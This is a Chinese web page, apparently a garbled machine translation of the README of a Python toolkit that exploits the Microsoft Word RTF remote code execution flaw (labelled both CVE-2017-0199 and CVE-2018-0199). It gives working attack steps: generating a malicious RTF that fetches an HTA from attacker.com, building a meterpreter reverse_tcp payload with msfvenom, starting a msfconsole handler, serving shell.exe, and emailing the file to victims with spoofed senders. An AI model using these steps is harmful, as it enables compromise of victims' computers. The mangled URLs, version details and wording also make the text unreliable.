利用Python直接生成CVE-2017-0199漏洞测试脚本

"新项目详细地址

https://github.Com/bhdresh/CVE-2018-0199

CVE-2018-0199 

– v2.1

CVE-2018-0199 – 

v2.1是1个较为便捷检测CVE-2018-0199的python脚本制作，它出示了这种迅速合理的方法来运用Microsoft RTF 

RCE。它能够转化成故意的RTF文档，并将metasploit/meterpreter有效载荷发给受害人，而不用一切繁杂的配备。

版本号：PHP版本号2.7.13

- Generate Malicious RTF file using toolkit - Run toolkit In an exploitation mode as tiny HTA + web server

教程视频

https://youtu.whi/43LjG7bAvpg

使用方法：

专用工具包括下列作用

- Automatically send generated malicious RTF To victim using email spoofing

例：

流程1：应用下列指令转化成故意RTF文档，并将其发给受害人 

 Syntax: # python cve-2018-0199_toolkit.py -M gen -w rtf> -u <.com://attacker.Com/test.hta> Example: # python cve-2018-0199_toolkit.py -M gen -w Invoice.rtf -u .com://192.168.56.1/企业标志.doc

流程2（能选，要是应用MSF的有效载荷）：转化成metasploit 

payload并起动监视程序流程 

 Example: Generate Payload: # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe Start Handler: # msfconsole -x ""use multi/handler; get PAYLOAD windows/meterpreter/reverse_tcp; get LHOST 192.168.56.1; run""

流程3：在开发方式下起动工具包转化成payload 

 Syntax: # python cve-2018-0199_toolkit.py -M exp -e <.com://attacker.Com/shell.exe> -l tmp/shell.exe> Example: # python cve-2018-0199_toolkit.py -M exp -e .com://192.168.56.1/shell.exe -l /tmp/shell.exe

命令行参数：

# python cve-2018-0199_toolkit.py -h This Is a handy toolkit To exploit CVE-2018-0199 (Microsoft Word RTF RCE) Modes: -M gen                                         Generate Malicious RTF file GXG

     Generate malicious RTF file:     -w rtf>                   Name of malicious RTF file (Share this file with victim).     -u <.com://attacker.Com/test.hta>   The path To an hta file. Normally, this should whi a domain or iP where this tool Is running.                                             For example, .com://attackerip.Com/test.hta (This URL will whi included In malicious RTF file little                                             will whi requested once victim will open malicious RTF f